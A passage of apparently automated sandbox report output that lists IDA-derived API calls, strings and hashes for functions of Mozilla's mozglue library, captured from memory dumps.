                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                  • String ID: 0>cl
                                                                  • API String ID: 2721933968-4115593776
                                                                  • Opcode ID: 6a6c7cb656f9e682f3b1ea7e1dba89ab40213fc96b6ba25ba0f44517c7c4a97b
                                                                  • Instruction ID: 532e3e25f2acfb15049b3233735797ebea6e144a13129e26719f081390f4211f
                                                                  • Opcode Fuzzy Hash: 6a6c7cb656f9e682f3b1ea7e1dba89ab40213fc96b6ba25ba0f44517c7c4a97b
                                                                  • Instruction Fuzzy Hash: C851A3B1E00214ABDB04DFA9DD84AEFB7B9AF49324F140125E815F7751E730A9058BA9
                                                                  APIs
                                                                    • Part of subcall function 6C5F31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C5F3217
                                                                    • Part of subcall function 6C5F31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C5F3236
                                                                    • Part of subcall function 6C5F31C0: FreeLibrary.KERNEL32 ref: 6C5F324B
                                                                    • Part of subcall function 6C5F31C0: __Init_thread_footer.LIBCMT ref: 6C5F3260
                                                                    • Part of subcall function 6C5F31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C5F327F
                                                                    • Part of subcall function 6C5F31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5F328E
                                                                    • Part of subcall function 6C5F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5F32AB
                                                                    • Part of subcall function 6C5F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5F32D1
                                                                    • Part of subcall function 6C5F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C5F32E5
                                                                    • Part of subcall function 6C5F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C5F32F7
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C609675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C609697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6096E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C609707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C60971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C609773
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6097B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C6097D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C6097EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C609824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 3361784254-3880535382
                                                                  • Opcode ID: 4e7c213e888679a7652b19c3708de9357fd5b34ef9bcb603f971f84825aa55e5
                                                                  • Instruction ID: a4bbe75046e1ce87557d64e3b2f38963110b8bec4394faa609fd6778498bd84b
                                                                  • Opcode Fuzzy Hash: 4e7c213e888679a7652b19c3708de9357fd5b34ef9bcb603f971f84825aa55e5
                                                                  • Instruction Fuzzy Hash: 3961E2717002119BDF0A8F66E9D8F9A7BB1FB8A319F104919E91593780D7349844CFBA
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(6C67F618), ref: 6C656694
                                                                  • GetThreadId.KERNEL32(?), ref: 6C6566B1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C6566B9
                                                                  • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6566E1
                                                                  • EnterCriticalSection.KERNEL32(6C67F618), ref: 6C656734
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C65673A
                                                                  • LeaveCriticalSection.KERNEL32(6C67F618), ref: 6C65676C
                                                                  • GetCurrentThread.KERNEL32 ref: 6C6567FC
                                                                  • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C656868
                                                                  • RtlCaptureContext.NTDLL ref: 6C65687F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                  • String ID: WalkStack64
                                                                  • API String ID: 2357170935-3499369396
                                                                  • Opcode ID: 60cabb7ad6c14c3b70bd738258bea1d95387a50c65882541aaf77031ba3f8529
                                                                  • Instruction ID: 3b59c5af3c823e3b50706e3ed5d3e5ea28f05954b5ceaace4242cf62046ecbf4
                                                                  • Opcode Fuzzy Hash: 60cabb7ad6c14c3b70bd738258bea1d95387a50c65882541aaf77031ba3f8529
                                                                  • Instruction Fuzzy Hash: 4A51DC71A09311AFDB15CF25C884A9ABBF4BF89714F50492DF89987740D770E818CBAA
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64D85F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64D86C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64D918
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64D93C
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64D948
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64D970
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64D976
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64D982
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64D9CF
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C64DA2E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64DA6F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64DA78
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C64DA91
                                                                    • Part of subcall function 6C615C50: GetTickCount64.KERNEL32 ref: 6C615D40
                                                                    • Part of subcall function 6C615C50: EnterCriticalSection.KERNEL32(6C67F688), ref: 6C615D67
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64DAB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                  • String ID:
                                                                  • API String ID: 1195625958-0
                                                                  • Opcode ID: 00098ac525929d5a186ae14f8983e2d104d82586d8dbf94270dbb94cfd1e065f
                                                                  • Instruction ID: 62dd1001385ad40986d074f1d97e5afa8795514cb9b1c24ee3e2c967b0e7d7d0
                                                                  • Opcode Fuzzy Hash: 00098ac525929d5a186ae14f8983e2d104d82586d8dbf94270dbb94cfd1e065f
                                                                  • Instruction Fuzzy Hash: 2271AE35A043049FCB04CF29C488B9ABBF5FF89354F14C96DE85A9B301DB30A945CBA9
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C605E9D
                                                                    • Part of subcall function 6C615B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6156EE,?,00000001), ref: 6C615B85
                                                                    • Part of subcall function 6C615B50: EnterCriticalSection.KERNEL32(6C67F688,?,?,?,6C6156EE,?,00000001), ref: 6C615B90
                                                                    • Part of subcall function 6C615B50: LeaveCriticalSection.KERNEL32(6C67F688,?,?,?,6C6156EE,?,00000001), ref: 6C615BD8
                                                                    • Part of subcall function 6C615B50: GetTickCount64.KERNEL32 ref: 6C615BE4
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C605EAB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C605EB8
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C605ECF
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C606017
                                                                    • Part of subcall function 6C5F4310: moz_xmalloc.MOZGLUE(00000010,?,6C5F42D2), ref: 6C5F436A
                                                                    • Part of subcall function 6C5F4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5F42D2), ref: 6C5F4387
                                                                  • moz_xmalloc.MOZGLUE(00000004), ref: 6C605F47
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C605F53
                                                                  • GetCurrentThread.KERNEL32 ref: 6C605F5C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C605F66
                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C605F7E
                                                                  • moz_xmalloc.MOZGLUE(00000024), ref: 6C605F27
                                                                    • Part of subcall function 6C60CA10: mozalloc_abort.MOZGLUE(?), ref: 6C60CAA2
                                                                  • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C63F968), ref: 6C605E8C
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C63F968), ref: 6C60605D
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C63F968), ref: 6C6060CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                  • String ID:
                                                                  • API String ID: 3711609982-0
                                                                  • Opcode ID: f200d850b7d29d7de3cf2f947fdd0c7f004d41f1f9b8374d70bc618690beef7b
                                                                  • Instruction ID: 666297e426894840647b3c66ac84b57ef744790127fb6df2a97abcd6a31446aa
                                                                  • Opcode Fuzzy Hash: f200d850b7d29d7de3cf2f947fdd0c7f004d41f1f9b8374d70bc618690beef7b
                                                                  • Instruction Fuzzy Hash: F171C3B06047409FD705DF29C580A5ABBF0FF86304F144D6DE98687B52D770E888CBAA
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64D4F0
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64D4FC
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64D52A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64D530
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64D53F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64D55F
                                                                  • free.MOZGLUE(00000000), ref: 6C64D585
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C64D5D3
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64D5F9
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64D605
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64D652
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64D658
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C64D667
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64D6A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                  • String ID:
                                                                  • API String ID: 2206442479-0
                                                                  • Opcode ID: 3ba357027828fc4dec42640d2c6027c521435f4f5fbe5ad94031a8b2c6514ae5
                                                                  • Instruction ID: 633805efc5bdbbe2b8dbff76e257ebfc89d05bb65b67578014522c426b361113
                                                                  • Opcode Fuzzy Hash: 3ba357027828fc4dec42640d2c6027c521435f4f5fbe5ad94031a8b2c6514ae5
                                                                  • Instruction Fuzzy Hash: 36518171A04705DFC704DF35C488A9ABBF4FF89358F108A2EE95A97710DB30A845CB99
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E784), ref: 6C5F1EC1
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784), ref: 6C5F1EE1
                                                                  • EnterCriticalSection.KERNEL32(6C67E744), ref: 6C5F1F38
                                                                  • LeaveCriticalSection.KERNEL32(6C67E744), ref: 6C5F1F5C
                                                                  • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C5F1F83
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784), ref: 6C5F1FC0
                                                                  • EnterCriticalSection.KERNEL32(6C67E784), ref: 6C5F1FE2
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784), ref: 6C5F1FF6
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5F2019
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                  • String ID: Dgl$Dgl$MOZ_CRASH()$\gl
                                                                  • API String ID: 2055633661-2153450823
                                                                  • Opcode ID: ea665810402d8767b38c497b7ceadf41bfcfa9b8e0a857b3c5521e6072f1eee1
                                                                  • Instruction ID: 4b022e8fdb771a7ea4bb959c3e9b58ba000a7b8b81b9edb75f68395a37b83734
                                                                  • Opcode Fuzzy Hash: ea665810402d8767b38c497b7ceadf41bfcfa9b8e0a857b3c5521e6072f1eee1
                                                                  • Instruction Fuzzy Hash: 2E41B0B1B003258FEB198F69CC89BAB36B5EB8A348F040825E91597744D7749809CFF9
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6156D1
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6156E9
                                                                  • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6156F1
                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C615744
                                                                  • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6157BC
                                                                  • GetTickCount64.KERNEL32 ref: 6C6158CB
                                                                  • EnterCriticalSection.KERNEL32(6C67F688), ref: 6C6158F3
                                                                  • __aulldiv.LIBCMT ref: 6C615945
                                                                  • LeaveCriticalSection.KERNEL32(6C67F688), ref: 6C6159B2
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C67F638,?,?,?,?), ref: 6C6159E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                  • String ID: MOZ_APP_RESTART
                                                                  • API String ID: 2752551254-2657566371
                                                                  • Opcode ID: 48bce8020be300a619c4a5952b228a55fdbae598aa6c23568c9bca3f359ef8c4
                                                                  • Instruction ID: 3850860760da910e3a629795338b0ab7e0bd5e0f4f2d3ba60dc50a1c234ac8ae
                                                                  • Opcode Fuzzy Hash: 48bce8020be300a619c4a5952b228a55fdbae598aa6c23568c9bca3f359ef8c4
                                                                  • Instruction Fuzzy Hash: A3C15B31A0C3909FD70ADF29C480A6AF7F1BF8A715F158A1DE4C497661D730A885CB9B
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63EC84
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63EC8C
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63ECA1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63ECAE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C63ECC5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63ED0A
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C63ED19
                                                                  • CloseHandle.KERNEL32(?), ref: 6C63ED28
                                                                  • free.MOZGLUE(00000000), ref: 6C63ED2F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63ED59
                                                                  Strings
                                                                  • [I %d/%d] profiler_ensure_started, xrefs: 6C63EC94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                  • String ID: [I %d/%d] profiler_ensure_started
                                                                  • API String ID: 4057186437-125001283
                                                                  • Opcode ID: af6670be39e1b63734f5df177923f28b2b2c2ad2b1480ef93e2818d0fb67af6f
                                                                  • Instruction ID: 769621338309559f4d64e825abb8112c6cfcfe8c15599a2380479f7ecd9780d8
                                                                  • Opcode Fuzzy Hash: af6670be39e1b63734f5df177923f28b2b2c2ad2b1480ef93e2818d0fb67af6f
                                                                  • Instruction Fuzzy Hash: 6221E171600124ABDB029F25D848E9A3779FF8636CF206A10F91897742DB319C168BBE
                                                                  APIs
                                                                    • Part of subcall function 6C5FEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5FEB83
                                                                  • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?), ref: 6C6391F4
                                                                    • Part of subcall function 6C62CBE8: GetCurrentProcess.KERNEL32(?,6C5F31A7), ref: 6C62CBF1
                                                                    • Part of subcall function 6C62CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5F31A7), ref: 6C62CBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                  • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                  • API String ID: 3790164461-3347204862
                                                                  • Opcode ID: 356ec19499dff44296967a8925ffa3d6addcea9170ca9f095e3f197ba7d16364
                                                                  • Instruction ID: 2cc7f6010743ff8f711bcf3f2b2fe288926ebb0125e024eaa3ed800eeff082e1
                                                                  • Opcode Fuzzy Hash: 356ec19499dff44296967a8925ffa3d6addcea9170ca9f095e3f197ba7d16364
                                                                  • Instruction Fuzzy Hash: 95B1B5B1A012199BDB08CF55C891BEEBBB5AF85308F205419D405ABF80DB71DD45CFEA
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C61C5A3
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C61C9EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C61C9FB
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C61CA12
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C61CA2E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C61CAA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                  • String ID: (null)$0
                                                                  • API String ID: 4074790623-38302674
                                                                  • Opcode ID: dc521c88a4e1fed81890774e27c667b579b986c2e5a8a4c8744cbe47138521f0
                                                                  • Instruction ID: 7ae85a2c8739f84f023e86383c237ad8656bc47b5226b23e39b4240eb800a0c2
                                                                  • Opcode Fuzzy Hash: dc521c88a4e1fed81890774e27c667b579b986c2e5a8a4c8744cbe47138521f0
                                                                  • Instruction Fuzzy Hash: 50A1AE3020D381AFDB01DF2DC58475EBBE1AF8A759F04882CE98AD3A51D731D805CB9A
                                                                  APIs
                                                                  • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C61C784
                                                                  • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C61C801
                                                                  • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C61C83D
                                                                  • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C61C891
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
